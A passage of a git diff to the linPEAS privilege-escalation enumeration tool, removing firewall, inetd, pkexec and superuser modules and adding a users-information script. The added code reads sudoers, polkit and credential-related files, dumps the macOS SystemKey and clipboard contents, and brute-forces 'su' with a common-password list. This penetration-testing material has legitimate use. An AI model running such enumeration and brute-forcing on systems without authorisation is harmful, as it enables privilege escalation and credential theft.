-    echo -e "\nActive Zones:"
-    warn_exec firewall-cmd --get-active-zones 2>/dev/null
-    
-    # List services
-    echo -e "\nAvailable Services:"
-    warn_exec firewall-cmd --list-services 2>/dev/null
-    
-    # List ports
-    echo -e "\nOpen Ports:"
-    warn_exec firewall-cmd --list-ports 2>/dev/null
-    
-    # List rich rules
-    echo -e "\nRich Rules:"
-    warn_exec firewall-cmd --list-rich-rules 2>/dev/null
-}
-
-# Function to analyze UFW rules
-analyze_ufw() {
-    echo ""
-    print_3title "UFW Rules"
-    
-    # Check if ufw is available
-    if ! check_command ufw; then
-        echo_not_found "ufw"
-        return
-    fi
-    
-    # Check if UFW is running
-    if ! ufw status >/dev/null 2>&1; then
-        echo "UFW is not running" | sed -${E} "s,.*,${SED_YELLOW},g"
-        return
-    fi
-    
-    # Get UFW version
-    warn_exec ufw version 2>/dev/null
-    
-    # List rules
-    echo -e "\nUFW Rules:"
-    warn_exec ufw status verbose 2>/dev/null
-    
-    # List numbered rules
-    echo -e "\nNumbered Rules:"
-    warn_exec ufw status numbered 2>/dev/null
-}
-
-# Main function to analyze firewall rules
-analyze_firewall_rules() {
-    print_2title "Firewall Rules Analysis"
-    
-    # Analyze different firewall systems
-    analyze_iptables
-    analyze_nftables
-    analyze_firewalld
-    analyze_ufw
-    
-    # Additional checks if EXTRA_CHECKS is enabled
-    if [ "$EXTRA_CHECKS" ]; then
-        echo ""
-        print_3title "Additional Firewall Information"
-        
-        # Check for common firewall configuration files
-        echo "Checking for firewall configuration files..."
-        for config_file in /etc/sysconfig/iptables /etc/sysconfig/ip6tables /etc/iptables/rules.v4 /etc/iptables/rules.v6 /etc/nftables.conf /etc/ufw/user.rules /etc/ufw/user6.rules; do
-            if [ -f "$config_file" ]; then
-                echo "Found configuration file: $config_file" | sed -${E} "s,.*,${SED_GREEN},g"
-            fi
-        done
-        
-        # Check for firewall management tools
-        echo -e "\nChecking for firewall management tools..."
-        for tool in shorewall shorewall6 ferm; do
-            if check_command "$tool"; then
-                echo "$tool is available" | sed -${E} "s,.*,${SED_GREEN},g"
-            fi
-        done
-    fi
-    
-    echo ""
-}
-
-# Run the main function
-analyze_firewall_rules
--- a/linPEAS/builder/linpeas_parts/5_network_information/9_Inetdconf.sh
+++ b/linPEAS/builder/linpeas_parts/5_network_information/9_Inetdconf.sh
@ -1,192 +0,0 @@
-# Title: Network Information - Inetd/Xinetd Services Analysis
-# ID: NT_Inetdconf
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Analyze inetd and xinetd services and configurations
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, print_3title, warn_exec, echo_not_found
-# Global Variables: $EXTRA_CHECKS, $E, $SED_RED, $SED_GREEN, $SED_YELLOW
-# Initial Functions:
-# Generated Global Variables: $inetd_service, $log_file, $cmd, $service_name, $conf_file, $service_dir, $service_file, $inetd_file
-# Fat linpeas: 0
-# Small linpeas: 0
-
-# Function to check if a command exists and is executable
-check_command() {
-    local cmd=$1
-    if command -v "$cmd" >/dev/null 2>&1; then
-        if [ -x "$(command -v "$cmd")" ]; then
-            return 0
-        fi
-    fi
-    return 1
-}
-
-# Function to analyze inetd services
-analyze_inetd() {
-    echo ""
-    print_3title "Inetd Services"
-    
-    # Check if inetd is installed
-    if ! check_command inetd; then
-        echo_not_found "inetd"
-        return
-    fi
-    
-    # Check if inetd is running
-    if ! pgrep -x inetd >/dev/null 2>&1; then
-        echo "inetd is not running" | sed -${E} "s,.*,${SED_YELLOW},g"
-    fi
-    
-    # Get inetd version
-    warn_exec inetd -v 2>/dev/null
-    
-    # Check main configuration file
-    if [ -f "/etc/inetd.conf" ]; then
-        echo -e "\nInetd Configuration (/etc/inetd.conf):"
-        warn_exec cat /etc/inetd.conf | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null
-        
-        # Check for potentially dangerous services
-        echo -e "\nPotentially Dangerous Services:"
-        warn_exec cat /etc/inetd.conf | grep -v "^$" | grep -Ev "\W+\#|^#" | grep -iE "shell|login|exec|rsh|rlogin|rexec|finger|telnet|ftp|tftp" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
-    else
-        echo_not_found "/etc/inetd.conf"
-    fi
-    
-    # Check for additional configuration files
-    echo -e "\nAdditional Inetd Configuration Files:"
-    for conf_file in /etc/inetd.d/* /etc/inet/*.conf; do
-        if [ -f "$conf_file" ]; then
-            echo "Found configuration in $conf_file:"
-            warn_exec cat "$conf_file" | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null
-        fi
-    done
-}
-
-# Function to analyze xinetd services
-analyze_xinetd() {
-    echo ""
-    print_3title "Xinetd Services"
-    
-    # Check if xinetd is installed
-    if ! check_command xinetd; then
-        echo_not_found "xinetd"
-        return
-    fi
-    
-    # Check if xinetd is running
-    if ! pgrep -x xinetd >/dev/null 2>&1; then
-        echo "xinetd is not running" | sed -${E} "s,.*,${SED_YELLOW},g"
-    fi
-    
-    # Get xinetd version
-    warn_exec xinetd -version 2>/dev/null
-    
-    # Check main configuration file
-    if [ -f "/etc/xinetd.conf" ]; then
-        echo -e "\nXinetd Configuration (/etc/xinetd.conf):"
-        warn_exec cat /etc/xinetd.conf | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null
-        
-        # Check for included configurations
-        echo -e "\nIncluded Configurations:"
-        warn_exec grep -r "includedir" /etc/xinetd.conf 2>/dev/null
-    else
-        echo_not_found "/etc/xinetd.conf"
-    fi
-    
-    # Check for service-specific configurations
-    echo -e "\nService Configurations:"
-    for service_dir in /etc/xinetd.d/ /etc/xinetd/; do
-        if [ -d "$service_dir" ]; then
-            echo "Services in $service_dir:"
-            for service_file in "$service_dir"/*; do
-                if [ -f "$service_file" ]; then
-                    service_name=$(basename "$service_file")
-                    echo -e "\nService: $service_name"
-                    # Check if service is enabled
-                    if grep -q "disable.*=.*no" "$service_file" 2>/dev/null; then
-                        echo "Status: Enabled" | sed -${E} "s,.*,${SED_RED},g"
-                    else
-                        echo "Status: Disabled"
-                    fi
-                    # Show service configuration
-                    warn_exec cat "$service_file" | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null
-                    
-                    # Check for potentially dangerous configurations
-                    if grep -qiE "server.*=.*/bin/|server.*=.*/sbin/|server.*=.*/usr/bin/|server.*=.*/usr/sbin/" "$service_file" 2>/dev/null; then
-                        echo "Warning: Service uses system binaries" | sed -${E} "s,.*,${SED_RED},g"
-                    fi
-                    if grep -qiE "user.*=.*root|user.*=.*0" "$service_file" 2>/dev/null; then
-                        echo "Warning: Service runs as root" | sed -${E} "s,.*,${SED_RED},g"
-                    fi
-                fi
-            done
-        fi
-    done
-}
-
-# Function to check for running inetd/xinetd services
-check_running_services() {
-    echo ""
-    print_3title "Running Inetd/Xinetd Services"
-    
-    # Check netstat for services
-    if check_command netstat; then
-        echo "Active Services (from netstat):"
-        warn_exec netstat -tulpn 2>/dev/null | grep -E "inetd|xinetd" | sed -${E} "s,.*,${SED_RED},g"
-    fi
-    
-    # Check ss for services
-    if check_command ss; then
-        echo -e "\nActive Services (from ss):"
-        warn_exec ss -tulpn 2>/dev/null | grep -E "inetd|xinetd" | sed -${E} "s,.*,${SED_RED},g"
-    fi
-    
-    # Check for service processes
-    echo -e "\nRunning Service Processes:"
-    for inetd_service in $(pgrep -l inetd 2>/dev/null; pgrep -l xinetd 2>/dev/null); do
-        echo "$inetd_service" | sed -${E} "s,.*,${SED_RED},g"
-    done
-}
-
-# Main function to analyze inetd/xinetd services
-analyze_inetd_services() {
-    print_2title "Inetd/Xinetd Services Analysis"
-    
-    # Analyze inetd and xinetd services
-    analyze_inetd
-    analyze_xinetd
-    
-    # Check for running services
-    check_running_services
-    
-    # Additional checks if EXTRA_CHECKS is enabled
-    if [ "$EXTRA_CHECKS" ]; then
-        echo ""
-        print_3title "Additional Inetd/Xinetd Information"
-        
-        # Check for inetd/xinetd logs
-        echo "Checking for service logs..."
-        for log_file in /var/log/inetd.log /var/log/xinetd.log /var/log/messages /var/log/syslog; do
-            if [ -f "$log_file" ]; then
-                echo "Found log file: $log_file" | sed -${E} "s,.*,${SED_GREEN},g"
-                warn_exec tail -n 20 "$log_file" | grep -iE "inetd|xinetd" 2>/dev/null
-            fi
-        done
-        
-        # Check for inetd/xinetd related files
-        echo -e "\nChecking for related files..."
-        for file in /etc/init.d/inetd /etc/init.d/xinetd /etc/default/inetd /etc/default/xinetd; do
-            if [ -f "$inetd_file" ]; then
-                echo "Found file: $inetd_file" | sed -${E} "s,.*,${SED_GREEN},g"
-                warn_exec cat "$inetd_file" | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null
-            fi
-        done
-    fi
-    
-    echo ""
-}
-
-# Run the main function
-analyze_inetd_services
--- a/linPEAS/builder/linpeas_parts/6_users_information.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information.sh
@ -0,0 +1,232 @@
+###########################################
+#----------) Users Information (----------#
+###########################################
+
+#-- UI) My user
+print_2title "My user"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users"
+(id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g"
+echo ""
+
+if [ "$MACPEAS" ];then
+  print_2title "Current user Login and Logout hooks"
+  defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook"
+  echo ""
+
+  print_2title "All Login and Logout hooks"
+  defaults read /Users/*/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook"
+  defaults read /private/var/root/Library/Preferences/com.apple.loginwindow.plist
+  echo ""
+
+  print_2title "Keychains"
+  print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#chainbreaker"
+  security list-keychains
+  echo ""
+
+  print_2title "SystemKey"
+  ls -l /var/db/SystemKey
+  if [ -r "/var/db/SystemKey" ]; then
+    echo "You can read /var/db/SystemKey" | sed -${E} "s,.*,${SED_RED_YELLOW},";
+    hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},";
+  fi
+  echo ""
+fi
+
+#-- UI) PGP keys?
+print_2title "Do I have PGP keys?"
+command -v gpg 2>/dev/null || echo_not_found "gpg"
+gpg --list-keys 2>/dev/null
+command -v netpgpkeys 2>/dev/null || echo_not_found "netpgpkeys"
+netpgpkeys --list-keys 2>/dev/null
+command -v netpgp 2>/dev/null || echo_not_found "netpgp"
+echo ""
+
+#-- UI) Clipboard and highlighted text
+if [ "$(command -v xclip 2>/dev/null)" ] || [ "$(command -v xsel 2>/dev/null)" ] || [ "$(command -v pbpaste 2>/dev/null)" ] || [ "$DEBUG" ]; then
+  print_2title "Clipboard or highlighted text?"
+  if [ "$(command -v xclip 2>/dev/null)" ]; then
+    echo "Clipboard: "$(xclip -o -selection clipboard 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
+    echo "Highlighted text: "$(xclip -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
+  elif [ "$(command -v xsel 2>/dev/null)" ]; then
+    echo "Clipboard: "$(xsel -ob 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
+    echo "Highlighted text: "$(xsel -o 2>/dev/null) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
+  elif [ "$(command -v pbpaste 2>/dev/null)" ]; then
+    echo "Clipboard: "$(pbpaste) | sed -${E} "s,$pwd_inside_history,${SED_RED},"
+  else echo_not_found "xsel and xclip"
+  fi
+  echo ""
+fi
+
+#-- UI) Sudo -l
+print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid"
+(echo '' | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,\!root,${SED_RED},") 2>/dev/null || echo_not_found "sudo"
+if [ "$PASSWORD" ]; then
+  (echo "$PASSWORD" | timeout 1 sudo -S -l | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g") 2>/dev/null  || echo_not_found "sudo"
+fi
+( grep -Iv "^$" cat /etc/sudoers | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g" ) 2>/dev/null  || echo_not_found "/etc/sudoers"
+if ! [ "$IAMROOT" ] && [ -w '/etc/sudoers.d/' ]; then
+  echo "You can create a file in /etc/sudoers.d/ and escalate privileges" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+fi
+for filename in /etc/sudoers.d/*; do
+  if [ -r "$filename" ]; then
+    echo "Sudoers file: $filename is readable" | sed -${E} "s,.*,${SED_RED},g"
+    grep -Iv "^$" "$filename" | grep -v "#" | sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" | sed "s,pwfeedback,${SED_RED},g"
+  fi
+done
+echo ""
+
+#-- UI) Sudo tokens
+print_2title "Checking sudo tokens"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens"
+ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)"
+if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then
+  echo "ptrace protection is disabled (0), so sudo tokens could be abused" | sed "s,is disabled,${SED_RED},g";
+
+  if [ "$(command -v gdb 2>/dev/null)" ]; then
+    echo "gdb was found in PATH" | sed -${E} "s,.*,${SED_RED},g";
+  fi
+
+  if [ "$CURRENT_USER_PIVOT_PID" ]; then
+    echo "The current user proc $CURRENT_USER_PIVOT_PID is the parent of a different user proccess" | sed -${E} "s,.*,${SED_RED},g";
+  fi
+
+  if [ -f "$HOME/.sudo_as_admin_successful" ]; then
+    echo "Current user has .sudo_as_admin_successful file, so he can execute with sudo" | sed -${E} "s,.*,${SED_RED},";
+  fi
+
+  if ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -v " " | grep -qE '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'; then
+    echo "Current user has other interactive shells running: " | sed -${E} "s,.*,${SED_RED},g";
+    ps -eo pid,command -u "$(id -u)" | grep -v "$PPID" | grep -v " " | grep -E '(ash|ksh|csh|dash|bash|zsh|tcsh|sh)$'
+  fi
+
+else
+  echo "ptrace protection is enabled ($ptrace_scope)" | sed "s,is enabled,${SED_GREEN},g";
+
+fi
+echo ""
+
+#-- UI) Doas
+if [ -f "/etc/doas.conf" ] || [ "$DEBUG" ]; then
+  print_2title "Checking doas.conf"
+  doas_dir_name=$(dirname "$(command -v doas)" 2>/dev/null)
+  if [ "$(cat /etc/doas.conf $doas_dir_name/doas.conf $doas_dir_name/../etc/doas.conf $doas_dir_name/etc/doas.conf 2>/dev/null)" ]; then
+    cat /etc/doas.conf "$doas_dir_name/doas.conf" "$doas_dir_name/../etc/doas.conf" "$doas_dir_name/etc/doas.conf" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_RED}," | sed "s,root,${SED_RED}," | sed "s,nopass,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW},"
+  else echo_not_found "doas.conf"
+  fi
+  echo ""
+fi
+
+#-- UI) Pkexec policy
+print_2title "Checking Pkexec policy"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2"
+(cat /etc/polkit-1/localauthority.conf.d/* 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED}," | sed -${E} "s,$groupsVB,${SED_RED}," | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,$USER,${SED_RED_YELLOW}," | sed -${E} "s,$Groups,${SED_RED_YELLOW},") || echo_not_found "/etc/polkit-1/localauthority.conf.d"
+echo ""
+
+#-- UI) Superusers
+print_2title "Superusers"
+awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED_YELLOW}," | sed "s,root,${SED_RED},"
+echo ""
+
+#-- UI) Users with console
+print_2title "Users with console"
+if [ "$MACPEAS" ]; then
+  dscl . list /Users | while read uname; do
+    ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2)
+    if grep -q "$ushell" /etc/shells; then #Shell user
+      dscl . -read "/Users/$uname" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+      echo ""
+    fi
+  done
+else
+  no_shells=$(grep -Ev "sh$" /etc/passwd 2>/dev/null | cut -d ':' -f 7 | sort | uniq)
+  unexpected_shells=""
+  printf "%s\n" "$no_shells" | while read f; do
+    if $f -c 'whoami' 2>/dev/null | grep -q "$USER"; then
+      unexpected_shells="$f\n$unexpected_shells"
+    fi
+  done
+  grep "sh$" /etc/passwd 2>/dev/null | sort | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+  if [ "$unexpected_shells" ]; then
+    printf "%s" "These unexpected binaries are acting like shells:\n$unexpected_shells" | sed -${E} "s,/.*,${SED_RED},g"
+    echo "Unexpected users with shells:"
+    printf "%s\n" "$unexpected_shells" | while read f; do
+      if [ "$f" ]; then
+        grep -E "${f}$" /etc/passwd | sed -${E} "s,/.*,${SED_RED},g"
+      fi
+    done
+  fi
+fi
+echo ""
+
+#-- UI) All users & groups
+print_2title "All users & groups"
+if [ "$MACPEAS" ]; then
+  dscl . list /Users | while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
+else
+  cut -d":" -f1 /etc/passwd 2>/dev/null| while read i; do id $i;done 2>/dev/null | sort | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g"
+fi
+echo ""
+
+#-- UI) Login now
+print_2title "Login now"
+(w || who || finger || users) 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+echo ""
+
+#-- UI) Last logons
+print_2title "Last logons"
+(last -Faiw || last) 2>/dev/null | tail | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_RED}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+echo ""
+
+#-- UI) Login info
+print_2title "Last time logon each user"
+lastlog 2>/dev/null | grep -v "Never" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+
+EXISTS_FINGER="$(command -v finger 2>/dev/null)"
+if [ "$MACPEAS" ] && [ "$EXISTS_FINGER" ]; then
+  dscl . list /Users | while read uname; do
+    ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2)
+    if grep -q "$ushell" /etc/shells; then #Shell user
+      finger "$uname" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
+      echo ""
+    fi
+  done
+fi
+echo ""
+
+#-- UI) Password policy
+if [ "$EXTRA_CHECKS" ]; then
+  print_2title "Password policy"
+  grep "^PASS_MAX_DAYS\|^PASS_MIN_DAYS\|^PASS_WARN_AGE\|^ENCRYPT_METHOD" /etc/login.defs 2>/dev/null || echo_not_found "/etc/login.defs"
+  echo ""
+
+  if [ "$MACPEAS" ]; then
+    print_2title "Relevant last user info and user configs"
+    defaults read /Library/Preferences/com.apple.loginwindow.plist 2>/dev/null
+    echo ""
+
+    print_2title "Guest user status"
+    sysadminctl -afpGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
+    sysadminctl -guestAccount status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
+    sysadminctl -smbGuestAccess status | sed -${E} "s,enabled,${SED_RED}," | sed -${E} "s,disabled,${SED_GREEN},"
+    echo ""
+  fi
+fi
+
+#-- UI) Brute su
+if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ]; then
+  print_2title "Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC
+  POSSIBE_SU_BRUTE=$(check_if_su_brute);
+  if [ "$POSSIBE_SU_BRUTE" ]; then
+    SHELLUSERS=$(cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1)
+    printf "%s\n" "$SHELLUSERS" | while read u; do
+      echo "  Bruteforcing user $u..."
+      su_brute_user_num "$u" $PASSTRY
+    done
+  else
+    printf $GREEN"It's not possible to brute-force su.\n\n"$NC
+  fi
+else
+  print_2title "Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)\n"$NC
+fi
+print_2title "Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!\n"$NC
--- a/linPEAS/builder/linpeas_parts/6_users_information/10_Pkexec.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/10_Pkexec.sh
@ -1,60 +0,0 @@
-# Title: Users Information - Pkexec
-# ID: UG_Pkexec
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Check Pkexec policy and related files for privilege escalation
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, print_info
-# Global Variables: $Groups, $groupsB, $groupsVB, $nosh_usrs, $sh_usrs, $USER
-# Initial Functions:
-# Generated Global Variables: $pkexec_bin, $policy_dir, $policy_file
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
-print_2title "Checking Pkexec and Polkit"
-print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html#pe---method-2"
-
-echo ""
-print_3title "Polkit Binary"
-# Check pkexec binary
-pkexec_bin=$(command -v pkexec 2>/dev/null)
-if [ -n "$pkexec_bin" ]; then
-  echo "Pkexec binary found at: $pkexec_bin" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
-  if [ -u "$pkexec_bin" ]; then
-    echo "Pkexec binary has SUID bit set!" | sed -${E} "s,.*,${SED_RED},g"
-  fi
-  ls -l "$pkexec_bin" 2>/dev/null
-  
-  # Check polkit version for known vulnerabilities
-  if command -v pkexec >/dev/null 2>&1; then
-    pkexec --version 2>/dev/null
-  fi
-fi
-
-# Check polkit policies
-echo ""
-print_3title "Polkit Policies"
-for policy_dir in "/etc/polkit-1/localauthority.conf.d/" "/etc/polkit-1/rules.d/" "/usr/share/polkit-1/rules.d/"; do
-  if [ -d "$policy_dir" ]; then
-    echo "Checking $policy_dir:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g"
-    if [ -w "$policy_dir" ]; then
-      echo "WARNING: $policy_dir is writable!" | sed -${E} "s,.*,${SED_RED},g"
-    fi
-    for policy_file in "$policy_dir"/*; do
-      if [ -f "$policy_file" ]; then
-        if [ -w "$policy_file" ]; then
-          echo "WARNING: $policy_file is writable!" | sed -${E} "s,.*,${SED_RED},g"
-        fi
-        cat "$policy_file" 2>/dev/null | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$Groups,${SED_RED},g"
-      fi
-    done
-  fi
-done
-
-# Check for polkit authentication agent
-echo ""
-print_3title "Polkit Authentication Agent"
-ps aux 2>/dev/null | grep -i "polkit" | grep -v "grep"
-echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/11_Superusers.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/11_Superusers.sh
@ -1,37 +0,0 @@
-# Title: Users Information - Superusers
-# ID: UG_Superusers
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Check for superusers and users with UID 0
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, print_info
-# Global Variables: $knw_usrs, $nosh_usrs, $sh_usrs, $USER
-# Initial Functions:
-# Generated Global Variables: $group
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
-print_2title "Superusers and UID 0 Users"
-print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html"
-
-# Check /etc/passwd for UID 0 users
-echo ""
-print_3title "Users with UID 0 in /etc/passwd"
-awk -F: '($3 == "0") {print}' /etc/passwd 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED_YELLOW},g" | sed "s,root,${SED_RED},g"
-
-if [ command -v getent >/dev/null 2>&1 ]; then
-    for group in sudo wheel adm docker lxd lxc root shadow disk video; do
-        if getent group "$group" >/dev/null 2>&1; then
-            echo "- Users in group '$group':"
-            getent group "$group" 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_RED},g"
-        fi
-    done
-fi
-
-# Check for users with sudo privileges in sudoers
-echo ""
-print_3title "Users with sudo privileges in sudoers"
-grep -v "^#" /etc/sudoers 2>/dev/null | grep -v "^$" | grep -v "^Defaults" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED_YELLOW},g" | sed "s,root,${SED_RED},g"
-echo ""
--- a/linPEAS/builder/linpeas_parts/6_users_information/12_Users_with_console.sh
+++ b/linPEAS/builder/linpeas_parts/6_users_information/12_Users_with_console.sh
@ -1,44 +0,0 @@
-# Title: Users Information - Users with console
-# ID: UG_Users_with_console
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Users with console
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title
-# Global Variables: $MACPEAS, $sh_usrs, $USER 
-# Initial Functions:
-# Generated Global Variables: $ushell, $no_shells, $unexpected_shells
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
-print_2title "Users with console"
-if [ "$MACPEAS" ]; then
-  dscl . list /Users | while read un; do
-    ushell=$(dscl . -read "/Users/$un" UserShell | cut -d " " -f2)
-    if grep -q "$ushell" /etc/shells; then #Shell user
-      dscl . -read "/Users/$un" UserShell RealName RecordName Password NFSHomeDirectory 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
-      echo ""
-    fi
-  done
-else
